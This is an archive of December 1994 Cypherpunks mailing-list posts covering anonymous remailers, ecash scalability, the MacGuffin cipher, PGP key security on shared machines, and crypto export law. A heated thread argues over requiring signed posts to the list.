(cjl) Date: Thu, 1 Dec 94 21:37:53 PST Subject: C-punx Corallary (sp?) 
Message-ID: If a thread on the C-punx list lasts long enough, the initials L.D. appear shortly before the invocation of the N*zis, usually posted by L.D. himself -) (blind lemon smiley) C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From dfloyd at io.com Thu Dec 1 21:38:30 1994 From: dfloyd at io.com (dfloyd at io.com) Date: Thu, 1 Dec 94 21:38:30 PST Subject: setting up an non remailer In-Reply-To: <199412020500.AAA00872@carr2.acpub.duke.edu> Message-ID: <199412020538.XAA14638@pentagon.io.com> > > > setting up an anon remailer > > To those who might know the answer.... > > I'm running a power mac here, and I have an ethernet port and my own IP > address. To do email, I telnet to my University's unix system. > > I was thinking, this sort of arrangement might allow me to set up an anon > remailer. Does anyone know if I can do this? If the technology is available? > > If there is a way to do this from a macintosh, I'd like to give it a try. > Of course, I would ask the sys admins if necessary for permission. (i.e., > if it can come straight to my IP address then it isn't necessary I assume). > > Thanks > > Tom > I don't see any remailer scripts for Macs, but there is a way. Get Mach10 from Tenon Intersystems, which is a generic BSD UNIX, and configure it to run a plain UNIX remailer. From cactus at hks.net Thu Dec 1 21:52:25 1994 From: cactus at hks.net (L. Todd Masco) Date: Thu, 1 Dec 94 21:52:25 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK In-Reply-To: <199412020536.VAA08584@jobe.shell.portal.com> Message-ID: <3bmcu5$934@bb.hks.net> In article <199412020536.VAA08584 at jobe.shell.portal.com>, wrote: >this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY >PROPERTY. 
anyone who pulls this kind of prickery, insinuating
>they are in the "bully pulpit", deserves
>CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK
>CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL.

Right on! Party on Cypherwonks, Larry's buying!
--
Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com | And even the plumbing looks good." - B Fuller

From eric at remailer.net Thu Dec 1 21:55:42 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 21:55:42 PST
Subject: ERIK HUGHES: EGOTISTICAL PRICK
In-Reply-To: <199412020536.VAA08584@jobe.shell.portal.com>
Message-ID: <199412020654.WAA14876@largo.remailer.net>

    ask him why he hasn't graduated from college!!

A.B. 1988 University of California, Berkeley. Mathematics. GPA 3.9.

Eric

From hfinney at shell.portal.com Thu Dec 1 22:09:09 1994
From: hfinney at shell.portal.com (Hal)
Date: Thu, 1 Dec 94 22:09:09 PST
Subject: Scalability of Ecash System / Article on Internet Cash available.
Message-ID: <199412020608.WAA12408@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

One thing that could be done with the on-line ecash system would be to decentralize the task of detecting double-spending. DigiCash could set up a large number of coin validation centers on the net, dispersed geographically to equalize the load. Then the merchants would do a simple hash algorithm on the electronic coin to determine which validation center to use. That center only records spent coins which have the specified hash. Since any attempt to double-spend would mean re-use of a particular coin, both instances would hash to the same validation center and so the re-use would be detected.

This way if a validation center went down it would hamper but not stop electronic commerce.
Other coins could perhaps be offered in payment in place of those which cannot be validated (although this would require a certain amount of trust of the shop, but perhaps not much more than is necessary already). This might address some of the scalability concerns raised with the on-line cash system.

Another idea comes from the NetCash people. Here you have the customer get a payment token from the bank which is made out to the specific merchant desired and given a time-stamp, perhaps good for one day. Now the merchant can accept these, check the signature, and check its own database of tokens which it has received earlier that day. As long as the incoming token is not in the database, the merchant can accept the payment with confidence and turn the tokens in to the bank for credit later as in an off-line system. Effectively these tokens would be digital cashier's checks.

The big problem with this is the difficulty of the customer getting his payment token anonymously. If the bank knows the customer who is asking for a particular "cashier's check" to be cut then it learns the customer's spending patterns, defeating his privacy. So there would have to be some communication infrastructure to allow for anonymous connections in order for this system to work.

Chaum, as it happens, has written on this topic as well, with his "Mix" and "DC-Net" systems for anonymous communications. Unfortunately, these systems have scaling problems of their own and don't appear to be entirely satisfactory for this purpose.
Hal Finney
hfinney at shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLt651RnMLJtOy9MBAQEzfwIApLw5dPjil4unqa0yToT1Wm5/kczvnE/E
IdXrWqhbVz32VqKw1d6QrG/I20t8RiZSG+yuBCPSOcoMi9XMRs2nnw==
=EJTS
-----END PGP SIGNATURE-----

From cactus at hks.net Thu Dec 1 22:18:14 1994
From: cactus at hks.net (cactus at hks.net)
Date: Thu, 1 Dec 94 22:18:14 PST
Subject: 2nd release of signing software
Message-ID: <199412020623.BAA09742@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I've made a couple of changes to the format of outgoing messages that should hopefully make life easier for readers.

The most noticeable will be the movement of the blurb, but also very significant is the removal of the "Reply-To: " (feh on the proliferation of MUA behaviors) header, and way down on the "noticeable" list is an "Errors-To: " and a "Sender: " header.

Thanks for y'all's comments: keep 'em coming.
- --
Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt69EyoZzwIn1bdtAQGLEwF8DAyzBUf0Z86xPHPKWsSaGM6cqSWJOrV8
kGDmEaQooJ9WhSYA5aOo1NtVZjgwOUgP
=KRYJ
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From mab at research.att.com Thu Dec 1 22:34:35 1994
From: mab at research.att.com (Matt Blaze)
Date: Thu, 1 Dec 94 22:34:35 PST
Subject: Paper available on new cipher
Message-ID: <9412020624.AA16990@merckx.info.att.com>

Bruce Schneier and I have been designing a block cipher, called "MacGuffin", based on a new variant of the standard Feistel (S-P) network structure. We are presenting a paper describing the cipher, entitled "The MacGuffin Block Cipher Algorithm", at the Leuven crypto algorithms workshop later this month.
Here's the abstract:

\begin{abstract}
This paper introduces MacGuffin, a 64 bit ``codebook'' block cipher. Many of its characteristics (block size, application domain, performance and implementation structure) are similar to those of the U.S. Data Encryption Standard (DES). It is based on a Feistel network, in which the cleartext is split into two sides with one side repeatedly modified according to a keyed function of the other. Previous block ciphers of this design, such as DES, operate on equal length sides. MacGuffin is unusual in that it is based on a {\em generalized unbalanced Feistel network (GUFN)} in which each round of the cipher modifies only 16 bits according to a function of the other 48. We describe the general characteristics of MacGuffin architecture and implementation and give a complete specification for the 32-round, 128-bit key version of the cipher.
\end{abstract}

A PostScript preprint of the paper is available via anonymous FTP from:
ftp://research.att.com/dist/mab/mcg.ps

A forthcoming paper will discuss the characteristics of the GUFN structure in more detail.

Comments and analysis greatly appreciated.

-matt

From mpd at netcom.com Thu Dec 1 22:38:31 1994
From: mpd at netcom.com (Mike Duvos)
Date: Thu, 1 Dec 94 22:38:31 PST
Subject: public accounts / PGP / passphrases
In-Reply-To: <199412020218.VAA06287@bb.hks.net>
Message-ID: <199412020639.WAA04821@netcom6.netcom.com>

lmccarth at ducie.cs.umass.edu writes:

> Could someone please elaborate on the foolishness of using
> PGP with a passphrase on a public machine (as I do) ?

It is not secure to use your private key on a machine that you do not have physical control over. It is probably secure to store a passphrase-protected private key on such a machine, as long as you do not feed it into a program which decrypts it.

> Am I wrong in thinking that my secret key is useless to an
> intruder until she guesses my passphrase ?
Or monitors your keystrokes as you type in your passphrase, or watches your address space as PGP uses the key, etc etc...

Given the state of Unix security, I would certainly not want to type my passphrase into a Unix box unless I was the only user, was directly connected to the box through a wire I could see, and had just done a fresh boot after verifying the MD5 hash on all the OS binaries. Not likely to be the case at your average public installation.

> I have no net access except via an account on a public
> machine, so I'm not about to start storing my secret key
> elsewhere, but I'll change my passphrase to if it's
> irrelevant anyway.

Having a passphrase will protect against casual acquisition of your private key, but only physical security when the key is used will protect you against a determined opponent.

---

As long as I am typing, permit me to add my two cents to the "digital signatures on the list" flame war.

Like many proponents of strong cryptography, I rarely use it in everyday life. I occasionally encrypt personal mail to friends overseas when I know it is going to take numerous hops over insecure links en route, and I will digitally sign mail or Usenet articles if I want to say something that I consider important in a way that cannot be altered or spoofed. This happens rarely.

I would consider having to digitally sign everything I post to the list, no matter how frivolous, the moral equivalent of being allowed to speak only while under sworn oath.

Now oaths and notaries are certainly useful things in appropriate places, like courtrooms and lawyers offices, but I don't think any of us would care to live our lives having our every utterance subject to their certification.
It would certainly not aid our cause to have the government be able to point and say - "Even the cypherpunks make people digitally identify themselves when posting messages to their list" - while at the same time attempting to explain to people why we aren't happy with Chaum's less than anonymous ECash or Web sites that require registration and personal information before permitting access to privacy-related material.

The Net, like life, offers a certain plausible deniability in what has been said, and who has said it. Some of the best messages on the list in past years have been Tim's witty and entertaining spoofs of his ideological opponents.

Let's save absolute certainty about the real or pseudo-anonymous identities of speakers in this forum for times when, in the sole opinion of the person posting, such certainty is deemed necessary.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From werewolf at io.org Thu Dec 1 22:48:08 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 1 Dec 94 22:48:08 PST
Subject: DETWEILER IS SPOOFING US!!!
In-Reply-To: <199412020516.AA02430@bolero.rahul.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412020516.AA02430 at bolero.rahul.net>, nobody at rahul.net wrote:
>
>noticed all the unusual people posting lately??? they are
>DETWEILER TENTACLES!!!!

I for one, resent being called a tentacle.....although it IS one notch above being called an asshole....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt6+0K+YbMzawbu5AQEhjgQAvP4nKOZwGpji/0ybEHQH3bQUGGDI9xaQ
Bq7jgQL980kUYpX4cb0emyJrPaG+qidQtkGOj3IThJMU3DyrFR6IAxL1BcFztQlm
2l9Q34CTDCcLFNBFaIvJ0JiaebvsAHN6L2AMz9xTnr14H3vbqmDa3ropc1iX9Hea
6o33VskKslg=
=o73Y
-----END PGP SIGNATURE-----

From shamrock at netcom.com Thu Dec 1 23:04:06 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 1 Dec 94 23:04:06 PST
Subject: Brands excluded from digicash beta
Message-ID: <199412020704.XAA19579@netcom18.netcom.com>

Ralph wrote:

>I also have had no luck getting a beta client from digicash. I
>"registered" through their WWW forms page, and got no response for
>about a month. Then they sent me mail saying that they would be
>sending a client, but that they were unrolling it in stages. That was
>about a month ago. Perhaps this means I will get my client soon.
>
>This does not speak well for digicash. If they were not ready to beta
>their stuff, they should not have announced it. As it is, it makes
>them look like a flake.

Here is one possible explanation: As their beta test agreement states, the beta software is not licensed for use in the US. Some legal thing that I don't understand. A few US users are part of the beta test, probably because they kept bothering the guy who hands out the beta UID's early in the morning before he had his coffee.

I know that the people on this list have been advocating ecash long before a single line of code was written and that we all deserve an early try of the software. I am forwarding this to some of the folks at DigiCash, perhaps we can convince them to broaden the beta.

-- Lucky Green PGP encrypted mail preferred.

"The very atmosphere of firearms anywhere and everywhere restrains evil interference - they deserve a place of honor with all that's good."

From nobody at c2.org Thu Dec 1 23:06:57 1994
From: nobody at c2.org (Anonymous User)
Date: Thu, 1 Dec 94 23:06:57 PST
Subject: Tim May is RIGHT!!!
Message-ID: <199412020705.XAA07308@zero.c2.org> I'm sorry I can't say so under my real name, but I *vehemently agree* with Tim May about the authoritarian, heavy handed, generally outrageous egotism of Eric Hughes of recent. This is REALLY UPSETTING. Eric should be ASHAMED OF HIMSELF for strutting around like a peacock. he is EMBODYING THE DICTATORIAL APPROACH HE CLAIMS TO DEFY VIA CYPHERPUNK PHILOSOPHY. this is truly the most HYPOCRITICAL AND EGOMANIACAL action I have seen by anyone in recent times on this list. Tim May will leave the list? GOOD FOR YOU, TIM. Get the hell out of here. Eric Hughes may have had some good ideas ONCE UPON A TIME but hasn't kept up his end of the bargain of the cypherpunk agenda for a LONG, LONG TIME. just a WASHED-UP HAS BEEN, who defies the very ideals that he claims to espouse in the most dictatorial manner possible. oh, what's this? you're just going to DELAY the messages that don't have signatures? well, I'm sure the government would just love to slightly DELAY THE MAIL of people who don't have the proper ESCROWED KEYS. what's this? you aren't going to move to any more "serious" measures, such as actually BANNING UNSIGNED MAIL, at least, NOT YET? oh, THANK YOU, MR. ALMIGHTY GOD OF CYBERSPACE. ah, I'm sure Louis Freeh feels the same way---we aren't proposing any minor change that PREVENTS YOUR FREEDOMS, are we? gosh, the government is starting to look awfully nice in comparison to the TYRANNY OF A DICTATOR. this scene is getting REALLY STALE. oh, Mr. CYPHERPUNK FOUNDER, please tell me once again how you started this list, and how the volumes of posts by the public are really YOUR PERSONAL PROPERTY, and this is YOUR LIST. we are your "guests"???? BULLSHIT. any host that treats his guests like this is NOT A HOST. this is not graciousness but the crabby and cranky bossiness of a STELLAR INGRATE and a EGOTISTICAL JERK. 
From anonymous-remailer at xs4all.nl Thu Dec 1 23:07:52 1994
From: anonymous-remailer at xs4all.nl (Name withheld on request)
Date: Thu, 1 Dec 94 23:07:52 PST
Subject: PGP Tools under Linux
Message-ID: <199412020709.AA04740@xs1.xs4all.nl>

-----BEGIN PGP SIGNED MESSAGE-----

>I am using PGPTools to handle all the crypto functions in the second
>generation remailer that I have written. All the copies of PGPTools that I
>have found seem to be set up to compile on SUN workstations only.

That's interesting, because I developed it under Linux and MS/DOS, and there was a lot of trouble at the beginning with it not running on big-endian machines. It sounds like whoever "fixed" it for sparcs broke it for little-endian machines. The original should still be on ftp.csn.net; get it there and it should work.

>Mixmaster is both a remailer and a front end, and therefore must run on many
>different platforms. I have been able to compile PGPTools on Linux and
>FreeBSD, but PGPTools produces invalid RSA blocks. If you (or anyone else
>reading this) have ported PGPTools to other platforms could you send me the
>source and makefile, or point me to them. If not, could you help me do it,
>the source code is a tangle, and it will take me a long time to do on my own
>(I am a brute force programmer, not a C wizard).

Get the original, test it, and post the results.

Some people have asked if I am still around. Yes, I am, and I'm thinking about a major update of PGPTools. The update would involve getting out any persistent bugs I can find, cleaning up the code and making it completely reentrant, and replacing all 2.3a modules with 2.6.x modules so it is patent-safe. It also needs some kind of exception handling for disk errors and the like. A pass-through function for the disk access calls, and a way of freeing all memory before a longjmp to bail out, for example.

Before doing this, I need to hear from the PGP development team.
There have been rumors of an upcoming PGP API, something similar to PGPTools. If this is the case, let me know so I don't waste time writing an incompatible version. If this is not the case, let me know so I can get started.

More information about NexusBucks, please. Is it for real? How many coins in circulation? Have any services been bought with them yet? What is the address of the Magic Money server? Is it fully automatic, or are messages being manually processed?

"There's never been a time in our history where it's been possible to place information beyond the reach of the collective efforts of society, but with modern cryptography you can." - Phil Zimmermann

"Large primes united, will never be divided!" - Pr0duct Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt6cDcGoFIWXVYodAQGZ8AP/bZASa9sn+QzDiQkDJqacBAPhpqQHfkhL
7kWh7belMm8gA6KFmLfZcPywCWm3zU1QOS2+xRzPUGP0f7MrQjDuj3h7M4X3fDDV
DiybwF4rIUAs2wBubioTYwE+as6N//CmfbtpkRdPVWhg5rnvgEOU+lzEvkhFt0tc
2MzkmHTBvIQ=
=CSzj
-----END PGP SIGNATURE-----

From alex at omaha.com Thu Dec 1 23:21:13 1994
From: alex at omaha.com (Alex Strasheim)
Date: Thu, 1 Dec 94 23:21:13 PST
Subject: CSPAN
Message-ID: <199412020722.BAA00166@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

Although it was probably an exercise in futility, I sent a note to CSPAN suggesting that they have PRZ as a guest on the Booknotes program that Brian Lamb hosts. I figured that maybe they could have him on in conjunction with the book version of PGP that the MIT press is coming out with.

In my note I made the argument that policy concerning crypto is really policy concerning wiretapping and surveillance, and that technological changes are eroding the status quo and forcing us to decide whether we want a lot more surveillance (or at least the potential for it) or a lot less, that since this is going to have a lot to do with how the police interact with the public in the future, it's an important issue, etc.
At the end, I appended the transcript of the talk PRZ gave in NYC that was recently posted to the list. I found that particular text to be pretty impressive, and I'm hoping that the folks at CSPAN will as well. There are a few details that I hope will go over well: MIT's involvement, the fact that PRZ has debated the NSA's general counsel, the quotes from the FBI director, etc. On top of that, the conference from which the transcript came seems like the sort of event that CSPAN would televise.

I don't know Phil, and I don't know if he'd even want to appear on the program. But there are two things about Booknotes that I think would make it a very good forum for the crypto debate. First of all, Phil would have enough time to explain the issues. That's important, because this isn't something that can be easily packed into a sound bite. Also, although I don't know this for a fact, I would imagine that the program would probably be a pretty good way to reach people on this Hill, both members and staffers.

Anyway, I sent them Phil's phone number and his email address. The encouraging thing is that I sent this out more than a day ago, and I haven't heard back from them yet. Ordinarily, when you send them email you get a form letter back within an hour or two. That gives me some hope that maybe some people over there are reading the transcript, and that perhaps they're thinking about it.

I don't know if CSPAN is open to lobbying or not, but the more I think about it, the more it seems to me that it could be a very useful forum for the debate. I think it would be worthwhile to let them know the next time Phil's going to speak at an event similar to the one I took the transcript from, and see if they'd be willing to televise it. My feeling is that if we can get the word out to the public at large, we're going to win.

==
Alex Strasheim | finger astrashe at nyx.cs.du.edu
alex at omaha.com | for my PGP 2.6.1.
public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From tcmay at netcom.com Thu Dec 1 23:26:42 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 23:26:42 PST
Subject: Tim May is RIGHT!!!
In-Reply-To: <199412020705.XAA07308@zero.c2.org>
Message-ID: <199412020727.XAA16893@netcom7.netcom.com>

(Not Very) Anonymous User wrote:

> I'm sorry I can't say so under my real name, but I
> *vehemently agree* with Tim May about the authoritarian,
> heavy handed, generally outrageous egotism of Eric
> Hughes of recent. This is REALLY UPSETTING. Eric should
> be ASHAMED OF HIMSELF for strutting around like a
> peacock. he is EMBODYING THE DICTATORIAL APPROACH HE
> CLAIMS TO DEFY VIA CYPHERPUNK PHILOSOPHY. this is
> truly the most HYPOCRITICAL AND EGOMANIACAL action I
> have seen by anyone in recent times on this list.

Note that I have made no such claims. While I don't like the sound of the proposal, for various reasons, and while I didn't care for the "If Eric says it is so, then it is so" sycophancy, I can't find any evidence that Eric was strutting around like a peacock, etc.

> Tim May will leave the list? GOOD FOR YOU, TIM. Get
> the hell out of here. Eric Hughes may have had some

This is unlikely, as it sounds like the worst-case version of the proposal has been shelved.

I happen to think that this "flame war," as some have characterized it, has made more apparent the difficulties many on the list (perhaps most, as the Silent Majority is probably not in a better position, it seems to me) have in routinely signing posts. I like the "under oath" points Mike Duvos made today.

Rishab suggested we should talk about other things. Well, nothing is stopping folks from doing so.
I take the heated debate about this "sign or else" to be a sign of health; at least some topics can still generate furious debate.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From sglass at netcom.com Thu Dec 1 23:31:43 1994
From: sglass at netcom.com (sglass at netcom.com)
Date: Thu, 1 Dec 94 23:31:43 PST
Subject: cypherpunk signing service
Message-ID: <199412020736.CAA10394@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Operating System: SunOS 4.1.3_U1
Site: netcom12
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1021

Todd...

| The cypherpunks at hks.net service is now available.
|
| It will sign any message sent to cypherpunks at hks.net with its (currently
| 384 bit) key and forward the signed message to cypherpunks at toad.com.

Does this look right?

pub 384/27D5B76D 1994/12/01 Cypherpunk signing agent
Key fingerprint = 85 BA D4 6D B8 9D B6 B7 EB 74 11 48 42 45 61 F2

| I welcome any suggestions on the format of the message and the prepended
| message.

Why not stealth it and just appear as if the sender signed it?

| I've made a couple of changes to the format of outgoing messages that
| should hopefully make life easier for readers.

Thanks, Todd!
| The most noticeable will be the movement of the blurb, but also very
| significant is the removal of the "Reply-To: " (feh on the proliferation
| of MUA behaviors) header, and way down on the "noticeable" list is an
| "Errors-To: " and a "Sender: " header.

Lookin' good.

| Thanks for y'all's comments: keep 'em coming.

Good work.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From tcmay at netcom.com Thu Dec 1 23:32:28 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 23:32:28 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412012144.NAA13805@largo.remailer.net>
Message-ID: <199412020732.XAA17397@netcom7.netcom.com>

Eric Hughes wrote:

>
> I'd feel just about as strange (I hope) if people were saying "Look,
> Tim's the boss. He's the Big Kahuna. If you don't like his policies on
> his list, leave."
>
> "This is one _tasty_ burger"

Something to do with the metric system?

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From jamesd at netcom.com Thu Dec 1 23:35:33 1994
From: jamesd at netcom.com (James A.
Donald)
Date: Thu, 1 Dec 94 23:35:33 PST
Subject: using us crypto sw outside usa
In-Reply-To: <199412020051.BAA13040@cmir.arnes.si>
Message-ID: <199412020735.XAA05139@netcom3.netcom.com>

Tomaz Borstnar writes

>
> Hello!
>
> I was wondering what is the legal status for using rsaref outside usa.
> Is it legal or not?

Exporting it, as for example when you ftp it off a site in the US is illegal. Illegal in the US that is. Of course if you are not in the US, you probably do not give a shit. And if you are in the US, then you are not exporting it. This law was written for gun runners, not crypto exports.

>
> Also, what is the legal status of RC4 code posted to the net?

Lawyers will come armed with scalpels and will surgically remove this information from your brain if you reveal that you know it. (just kidding.)

But seriously folks, it was a trade secret, and therefore if you were the guy who blew it then you are in serious trouble :-)

Of course anybody can sue anyone for anything (in America) but I am happy to report that American lawyers are profoundly reluctant to sue in overseas courts. And even if the American courts could get at you, they do not have a leg to stand on. (Of course that has not stopped them in the past.)

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we      James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.          jamesd at acm.org

From wcs at anchor.ho.att.com Thu Dec 1 23:39:35 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 1 Dec 94 23:39:35 PST
Subject: Authentication at toad.com: WTF?
Message-ID: <9412010625.AA17536@anchor.ho.att.com>

-----BEGIN PGP SIGNED MATERIAL-----

> On Wed, 30 Nov 1994, The new cypherpunks signature checking agent wrote:
> > The below message was found to have a valid signature from "JEFF LICQUIA (CEI)
> > " JLICQUIA at mhc.uiuc.edu.

Apparently it was a spoof, but whatever. I'd be really bugged by the security implications of software claiming to have validated signatures; software that complains about bogus sigs is fine, since if it's spoofed it's only a warning, and if the warnings are deleted your trust is still somewhat limited unless you've verified the signatures yourself. Trusting someone else's verification is less than ideal security policy :-)

Bill

-----BEGIN PGP SIGNATURE-----
Pgp-version: 32767

uhohovhoehvohfvoihvhoviheoivhefoivhefohvefohv
jhjhohhuhvuhiuhewiuvhiuhfveiuhefviuhevhevhvhh
-----END PGP SIGNATURE-----

Cypherpunks signature checking agent: It's valid - trust me!

From laceyala at student.msu.edu Thu Dec 1 23:55:16 1994
From: laceyala at student.msu.edu (Alan J Lacey)
Date: Thu, 1 Dec 94 23:55:16 PST
Subject: hello
Message-ID: <9412020754.AA50275@student1.cl.msu.edu>

send me your zine pleas

From nobody at c2.org Fri Dec 2 00:06:45 1994
From: nobody at c2.org (Anonymous User)
Date: Fri, 2 Dec 94 00:06:45 PST
Subject: Larry is at it again, and is flaming old Eric now.
Message-ID: <199412020805.AAA07598@zero.c2.org>

[BIG flamo at Eric deleted... it ain't worth printing]

To keep Larry from forging in my name, I am going to fight fire with fire, and am going to anon post this.

Dude, what did Eric Hughes do to you to get you so rabid? As soon as you were found out, you started drooling. Ask your local vet school for your first series of rabies shots... you NEED them.

Eric Hughes spends his time and money for support of this list. Do you? Probably not. If he wants signatures, IT'S HIS DAMN LIST.

Enough of flaming at you, buddy.
You are too wasted to hear anything but your typing and drool dropping to the floor as you try to spam this list again.

About two months ago, Tim May bitched about the coming of a ton of dillweeds on the Net. Guess I agree on this point with him.

LD, there is something called Electro Convulsive Therapy. It does a good job of helping cases that would otherwise be too far gone for medicine. Take a good look at getting treatment. It seems you need it.

-- A lurker who does not like the maintainer of this list getting treated like crap for trying something new.

From frissell at panix.com Fri Dec 2 02:02:42 1994
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 2 Dec 94 02:02:42 PST
Subject: NYT Potpurri and Econo-cash
Message-ID: <199412021001.AA27082@panix.com>

>"And flirting with heresy, Mr. Spindler says he sees no need
>for the so-called information superhighway. And 500 channels?
>Sixty are plenty. 'This is not going to be an all-electronic

Pretty stupid considering that the non-interactive 150 channel RCA/Hughes DBS system is one of the hottest sellers of this holiday season.

DCF

From wolfgang at wi.WHU-Koblenz.de Fri Dec 2 02:05:33 1994
From: wolfgang at wi.WHU-Koblenz.de (Wolfgang Roeckelein)
Date: Fri, 2 Dec 94 02:05:33 PST
Subject: Brands excluded from digicash beta
Message-ID: <9412021004.AA03854@sirius.wi.WHU-Koblenz.de>

Hi,

paul at poboy.b17c.ingr.com (Paul Robichaux) wrote:
>The more I deal with Digicash, the better First Virtual looks. My technical
>preference is for using Brands or Chaum cash; at present, though, there aren't
>any shipping Brands servers, and the Digicash folks don't seem to be able to
>get all their socks in one bag.

Does anybody know how the chaum patents (I think they claimed somewhere that they had applied for some) affect Brands system?

Wolfgang
---
Dipl.-Wirtsch.-Inf.
Voice: +49 261 6509 173
Wolfgang Roeckelein     Fax: +49 261 6509 179
WHU Koblenz             E-Mail: roeckelein at wi.whu-koblenz.de
Burgplatz 2             (NeXTmail ok)
D-56179 Vallendar
Germany

From adam.philipp at ties.org Fri Dec 2 02:30:14 1994
From: adam.philipp at ties.org (adam.philipp at ties.org)
Date: Fri, 2 Dec 94 02:30:14 PST
Subject: using us crypto sw outside usa
Message-ID: <199412021035.FAA11778@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

>I was wondering what is the legal status for using rsaref outside usa.
>Is it legal or not?

Depends on whether RSA has a patent in that country... I know of no countries besides the U.S.A. that have a patent on RSA. Using exact code may also violate copyright...that is a tougher matter to prove...but copyright treaties allow some level of international protection...use with care.

>Also, what is the legal status of RC4 code posted to the net?

It was a trade secret. It is no longer...Copyright issues are still a problem, but ask an attorney in your country if you are going to use it in a commercial program.

Adam Philipp

- --
PGP Key available on the keyservers. Encrypted E-mail welcome.
SUB ROSA: Confidential, secret, not for publication. -Black's Law Dictionary
GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++--

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From John.Schofield at sprawl.expressnet.org Fri Dec 2 04:11:26 1994
From: John.Schofield at sprawl.expressnet.org (John Schofield)
Date: Fri, 2 Dec 94 04:11:26 PST
Subject: The thread that would not die.
(Mandating signatures)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

It is silly to talk of someone "owning" the list. The list is a community. The only possible owners are the people in the community. If we all left, Eric would still have control over the list--but the list would be worthless.

It is just as silly, though, to talk about whether or not Eric has the "right" to enforce his ideas. He *CAN* make changes to the list--anything else is irrelevant.

This whole discussion seems to be based on the idea that signing everything is a Good Thing. Yet I haven't seen a convincing argument for that. If I read a forged message, I haven't been hurt. If the person being impersonated doesn't exist, nobody has been harmed--and if he does, ONLY that person has been harmed.

So, let's put the onus here where it belongs. If people feel their reputations are important enough that they need to sign their messages, more power to them. If they don't feel it is important, who are you to tell them the value of THEIR reputations?

When signatures are easy enough to do, the scale will balance on the side of security--people will value their reputations more than the trouble it takes to sign messages. Until then, people will not sign.

For me, signing is easy--even though I am ridiculously unconnected right now. So I do it, using an off-line mail-reader shell that I wrote and distributed myself. The list members who are convinced that digital signatures are valuable could do much more to advance their cause by eliminating some of the barriers to using digital signatures than by mandating them.

Any type of a stick will not work very well in this situation. The people most interested in privacy and encryption are those who are by nature most individualistic and stubborn. Forcing them to do something will make most of them go the other way, or go away. I know my mind works that way.

-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Call 818-345-8640 voice for info on Keep Out magazine.
-----END PGP SIGNATURE-----

**EZ-PGP v1.07
--- Blue Wave/RA v2.12
--
|Expressnet: John Schofield 11:310/12
|Internet: John.Schofield at sprawl.expressnet.org
|
| Standard disclaimer: The views of this user are strictly his own.

From mccoy at io.com Fri Dec 2 05:11:54 1994
From: mccoy at io.com (Jim McCoy)
Date: Fri, 2 Dec 94 05:11:54 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <9412021004.AA03854@sirius.wi.WHU-Koblenz.de>
